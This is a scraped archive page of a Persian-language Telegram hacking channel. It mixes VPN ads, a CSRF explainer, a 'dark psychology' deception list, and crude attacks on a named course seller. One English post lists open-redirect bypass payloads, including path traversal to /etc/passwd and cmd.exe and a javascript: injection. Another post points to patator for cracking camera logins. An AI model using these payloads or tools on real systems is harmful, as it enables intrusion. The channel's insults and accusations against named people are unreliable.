uz
Feedback
BugLearn

BugLearn

Kanalga Telegram’da o‘tish
3 267
Obunachilar
+824 soatlar
+37 kun
-1530 kun
Postlar arxiv
بچه ها بنظرم بیخیالشید 😂😂😂

دوستان یه دوره دستمون رسیده تحت عنوان هک سکس کسی می دونه چیه😂😂؟

چنل برسه به 2K سوپرایز داریم برای بچه هایی که وب کار میکنن😉👨‍💻

برای خرید کانفیگ های پرسرعت با قیمت های باور نکردنی به آیدی زیر مراجعه کنید 😍 @nika_magician @prisvpn

بچه ها انشاالله ۱۲۰ تا از این شبا ببینید 🖤🖤

بچه ها امشب تا فرداشب میتونید با تخفیف یلدایی کانفیگ خریداری کنید 😍🍉 به علاوه تخفیف ،هدیه هم دریافت کنید از ما 😍 @prisvpn @nika_magician

https://www.instagram.com/al_ph_a13?igsh=OG9vOXZxcnZjNzkz دوستان ممنون میشم پیج اینستاگراممون رو دنبال کنید کلی مطلب برنامه نویسی و هک و امنیت خواهیم داشت داخلش دوره جدید براتون میزاریم اگر ۱۲۰ نفر برسه دنبال کننده ها

🎯 آسیب‌پذیری CSRF چیست؟ 🤔  تصور کن وارد سایت بانک یا هر سرویس مهم دیگه‌ای شدی و لاگین موندی. حالا یه لینک مشکوک رو توی پیام، ایمیل، یا کامنت باز می‌کنی. 😱 با این کار، ممکنه بدون اینکه حتی متوجه بشی، پولت رو به یه حساب دیگه منتقل کنی، تنظیمات حسابت رو تغییر بدی یا کاری خطرناک انجام بدی! 😨   این دقیقاً همون چیزیه که بهش CSRF یا حمله جعل درخواست میان‌وب‌گاهی هم می‌گن.   CSRF چطور کار می‌کنه؟ 🕵️‍♂️ تو لاگین هستی: برای اینکه بتونی از خدمات سایت استفاده کنی، مثل بانک یا شبکه اجتماعی، لاگین کردی و مرورگرت اطلاعات احراز هویت (مثل کوکی‌ها یا توکن‌ها) رو ذخیره کرده.   هکر یه لینک یا فرم مخرب درست می‌کنه: یه کد مخرب داخل لینک یا حتی یک دکمه جعلی قرار می‌ده که در ظاهر بی‌ضرره.   تو فریب می‌خوری: روی لینک کلیک می‌کنی یا یه فرم به ظاهر عادی رو ارسال می‌کنی.   درخواست جعلی ارسال می‌شه: مرورگر تو، با اطلاعات لاگین معتبرت، اون درخواست رو به سرور می‌فرسته و سرور چون تو رو لاگین شده می‌شناسه، اون رو معتبر می‌دونه و اجرا می‌کنه.   چرا CSRF خطرناکه؟ 😱 - غیرقابل‌تشخیص برای کاربر: تو هیچ نشونه‌ای نمی‌بینی که بفهمی یه درخواست جعلی ارسال شده.   - دستکاری اطلاعات حساس: هکر می‌تونه پول انتقال بده، رمز عبور عوض کنه، یا تنظیماتت رو تغییر بده.   - همه‌جا رخ می‌ده: از سرویس‌های بانکی گرفته تا شبکه‌های اجتماعی، همه می‌تونن قربانی بشن.   چطور می‌شه جلوی CSRF رو گرفت؟ 🚨 برای کاربران:1️⃣ وی لینک‌های مشکوک کلیک نکنید: چه از طریق ایمیل، پیام، یا حتی شبکه‌های اجتماعی، قبل از کلیک چک کنید لینک معتبر باشه.   2️⃣ بعد از استفاده، لاگ‌اوت کنید: به‌خصوص در سرویس‌های حساس مثل بانکداری آنلاین یا حساب‌های مهم.   3️⃣ از مرورگرهای امن استفاده کنید: مرورگرهایی که به‌روز هستند و از کوکی‌های امن پشتیبانی می‌کنند.   برای توسعه‌دهندگان:1️⃣ توکن CSRF استفاده کنید: این توکن یک رشته تصادفی و منحصربه‌فرده که با هر درخواست کاربر ارسال می‌شه و فقط در صورتی که معتبر باشه، درخواست پذیرفته می‌شه.   2️⃣ متدهای امن HTTP رو استفاده کنید: درخواست‌های حساس مثل تغییر اطلاعات یا ارسال داده باید فقط از طریق متدهای POST یا PUT انجام بشن، نه GET.   3️⃣ اعتبارسنجی منبع درخواست: مطمئن بشید که درخواست از دامنه‌ای که بهش اعتماد دارید ارسال شده.   4️⃣ استفاده از کوکی‌های SameSite: تنظیمات کوکی‌ها رو طوری پیکربندی کنید که فقط از سایت خودتون قابل ارسال باشن. 5⃣ استفاده از حالت ناشناس : یکی دیگه از راهکار های جلوگیری از CSRF استفاده از حالت ناشناس مرورگر هست ، زیرا هیچگونه داده ای مانند توکن ، کوکی یا ... استفاده نمیشود . 6⃣ بلاک کردن توکن یا کوکی از خود مرورگر . نتیجه‌گیری:CSRF یکی از اون حمله‌های خطرناکه که اگر پیشگیری نکنیم، می‌تونه به اطلاعات و دارایی‌هامون آسیب بزنه. با رعایت نکات بالا و افزایش آگاهی، می‌تونیم خودمون و سرویس‌هامون رو ایمن نگه داریم. 🌐💡   امنیت رو جدی بگیریم! 💪   #امنیت #هکینگ #CSRF #امنیت_وب #آگاهی

@ItsCillianLinux یکی که کرکره بیاد پیوی کار سختی نیس

dark Psychology
در زیر هر یک از انواع فریب (deception) به همراه توضیحات و مثال‌هایی آورده شده است: ### 1. Mass Deception (فریب جمعی) توضیح: فریب جمعی به فرآیند تأثیرگذاری بر افکار و رفتار گروه‌های بزرگ از افراد اشاره دارد، معمولاً از طریق رسانه‌ها یا اطلاع‌رسانی نادرست. مثال: یک کمپین تبلیغاتی می‌تواند اطلاعات نادرست درباره یک محصول را منتشر کند تا مردم را متقاعد کند که این محصول خاص فوق‌العاده مؤثر و ضروری است. ### 2. Misdirection (سردرگمی) توضیح: این نوع فریب شامل منحرف کردن توجه افراد از واقعیت اصلی به چیزی دیگر است. این تکنیک در تردستی‌ها و فریب‌های روانشناختی به کار می‌رود. مثال: یک شعبده‌باز می‌تواند توجه تماشاگران را به سرعت به یک دستش جلب کند در حالی که با دست دیگرش چیزی را پنهان می‌کند یا جابجا می‌کند. ### 3. Verbal Deception (فریب کلامی) توضیح: این نوع فریب شامل گفتن اطلاعات نادرست یا گمراه‌کننده است که ممکن است به نظر منطقی بیاید، اما واقعیت ندارد. مثال: شخصی می‌تواند به دوستش بگوید: "من دیروز تو رو توی رستوران دیدم" در حالی که واقعاً آن شخص را ندیده است. این جمله می‌تواند به منظور ایجاد یک وضعیت خاص یا تصمیم‌گیری باشد. ### 4. Non-Verbal Deception (فریب غیرکلامی) توضیح: این نوع فریب شامل استفاده از زبان بدن، حرکات و رفتارها برای انتقال اطلاعات نادرست است. مثال: شخصی ممکن است در حال دروغ گفتن به کسی باشد، اما به جای اینکه از حرکات نادرست دست یا چشم خود استفاده کند، خود را به طور مصنوعی آرام و مطمئن نشان دهد تا فریب را مؤثرتر کند. ### 5. Bluffing (فریب‌کاری) توضیح: این نوع فریب معمولاً در بازی‌های استراتژیک یا رقابت‌ها استفاده می‌شود. فرد نشان می‌دهد که در موقعیتی قوی‌تر یا مطمئن‌تر از آنچه که واقعاً هست، قرار دارد. مثال: در یک بازی پوکر، یک بازیکن ممکن است با قرار دادن چند چیپ بزرگ در وسط میز، طوری رفتار کند که گویی یک دست بسیار قوی دارد، در حالی که در واقع کارت‌های ضعیفی در دست دارد. ### 6. Concealment (پنهان‌سازی) توضیح: پنهان‌سازی به معنای نگه‌داشتن اطلاعات یا واقعیت‌ها از دیگران است به طوری که آن‌ها از حقیقت آگاه نشوند. مثال: شخصی ممکن است از شریک زندگی‌اش درباره‌ی یک تصمیم مالی مهم که اتخاذ کرده است، پنهان‌کاری کند تا واکنش منفی او را از بین ببرد. ### 7. Fabrication (ساخت و ساز) توضیح: در این نوع فریب، شخصی اطلاعاتی را به طور کامل از نو ایجاد می‌کند یا دروغی را اختراع می‌کند. مثال: یک فرد ممکن است داستانی ثابت کند که او یک قهرمان جنگ بوده است، در حالی که هرگز در خدمات نظامی نبوده است. این کار می‌تواند برای افزایش اعتبار اجتماعی یا جلب توجه باشد. ### 8. Unpredictability (غیرقابل پیش‌بینی بودن) توضیح: این نوع فریب شامل رفتار غیرقابل پیش‌بینی است که فرد را از اقداماتی که ممکن است به درستی توجه دیگران را جلب کند، منحرف می‌کند. مثال: یک استراتژیست ممکن است در یک مذاکره به طور ناگهانی تصمیم بگیرد موضع خود را تغییر دهد و از نظر طرف مقابل غیرقابل پیش‌بینی عمل کند تا حریف را دچار سردرگمی کند و به نفع خود نتیجه بگیرد.

امروز همه چنل ها واگذار میشه بنده از حضورتون مرخص میشم کم سعادت بودیم تا بیشتر خدمت کنم بهتون

سلام بچه ها کسی می‌تونه سرور عمده بهم بده ؟ خریدارم ازش اگر کسی هست پیام بده @nika_magician @nika_magician

امشب با خرید vpn های ما سه گیگ حجم رایگان دریافت کنید 😍 برای خرید به آیدی زیر مراجعه کنید ☃️❄️ @nika_magician @nika_magician

هرکس که نمی تونست داخل چنل edb جوین بشه با موفقیت مشکل درست شد فقط دیگه از چنلا لفت ندید تا این مشکل براتون پیش نیاد

☄️You can try this effective manual Open Redirect Bypass☄️ 1. Null-byte injection:    - /google.com%00/    - //google.com%00   2. Base64 encoding variations:    - aHR0cDovL2dvb2dsZS5jb20=    - aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==    - //base64:d3d3Lmdvb2dsZS5jb20=/   3. Case-sensitive variations:    - //GOOGLE.com/    - //GoOgLe.com/ 4. Overlong UTF-8 sequences:    - %C0%AE%C0%AE%2F (overlong encoding for ../)    - %C0%AF%C0%AF%2F%2Fgoogle.com 5. Mixed encoding schemes:    - /%68%74%74%70://google.com    - //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D    - //base64:%2F%2Fgoogle.com/ 6. Alternative domain notations:    - //google.com@127.0.0.1/    - //127.0.0.1.xip.io/    - //0x7F000001/ (hexadecimal IP) 7. Trailing special characters:    - //google.com/#/    - //google.com/;&/    - //google.com/?id=123&// 8. Octal IP address format:    - http://0177.0.0.1/    - http://00177.0000.0000.0001/ 9. IP address variants:    - http://3232235777 (decimal notation of an IP)    - http://0xC0A80001 (hex notation of IP)    - http://192.168.1.1/ 10. Path traversal with encoding:     - /..%252f..%252f..%252fetc/passwd     - /%252e%252e/%252e%252e/%252e%252e/etc/passwd     - /..%5c..%5c..%5cwindows/system32/cmd.exe 11. Alternate protocol inclusion:     - ftp://google.com/     - javascript:alert(1)//google.com 12. Protocol-relative URLs:     - :////google.com/     - :///google.com/ 13. Redirection edge cases:     - //google.com/?q=//bing.com/     - //google.com?q=https://another-site.com/ 14. IPv6 notation:     - http://[::1]/     - http://[::ffff:192.168.1.1]/    
15. Double URL encoding:     - %252f%252fgoogle.com (encoded twice)     - %255cgoogle.com 16. Combined traversal & encoding:     - /%2E%2E/%2E%2E/etc/passwd     - /%2e%2e%5c%2e%2e/etc/passwd 17. Reverse DNS-based:     - https://google.com.reverselookup.com     - //lookup-reversed.google.com/ 18. Non-standard ports:     - http://google.com:81/     - https://google.com:444/ 19. Unicode obfuscation in paths:     - /%E2%80%8Egoogle.com/     - /%C2%A0google.com/ 20. Query parameters obfuscation:     - //google.com/?q=http://another-site.com/     - //google.com/?redirect=https://google.com/ 21. Using @ symbol for userinfo:     - https://admin:password@google.com/     - http://@google.com 22. Combination of userinfo and traversal:     - https://admin:password@google.com/../../etc/passwd

نمی دونم برادر چاخان میده یا واقعا گفتی ولی واقعا اگه گفتی بهت تبریک میگم تو یه احمق به تمام معنایی که جز کلاهبرداری و کپی برداری چیزی بلد نیسی اره بیان تو چنل وی ای پی تو یا دوره های تو یادبگیرن پنتست رو چطوری این پولا از گلوت پایین میره

بیار اومد گفت دوره های mcsa, oscp, sans تخمیه نبینین دیگه ببین یارو چقدر کصخله اومده سرفصل های بین‌المللی رو زیر سوال میبره 🤣🤣🤣🤣

یعنی واقعا بعد افشای پروفسور سنایی بازم دارید دوره هاشو میخرید؟ این پست هارو شیر کنید داخل گپ ها و کانالتون بقیه تو دام این کلاهبرداری نیوفتن

خب هنوز هم باور ندارید؟ بزارید یک مثال دیگه براتون بزنم آقای بهروز منصوری که دوره کلوپ امنیت 1 هک وبسایت رو از صفر تا صد رو به صورت حرفه ای آموزش میده و در جلو تر متوجه شدیم که کوروش سنایی (کلاهبردار اینترنتی) پکیج وب هکینگش کپی از دوره های بهروز منصوری بوده و نه تنها بهروز منصوری، بلکه کوروش سنایی از جاهای دیگه هم کپی رفته

این هم ابزارییه که باهاش صفحه ورود به دوربین های مداربسته رو کرک میکنن😂😂 patator یک ابزار کاملا رایگان روی کالی لینوکس هست
این هم ابزارییه که باهاش صفحه ورود به دوربین های مداربسته رو کرک میکنن😂😂 patator یک ابزار کاملا رایگان روی کالی لینوکس هست و کلی آموزش خوب و درست حسابیه رایگان ازش توی اینترنت موجوده! کل دوره های این بشر دقیقا همینطوره! استفاده از ابزار های پابلیک و آموزش مطالب و تکنیک های پابلیک در سطح اینترنت!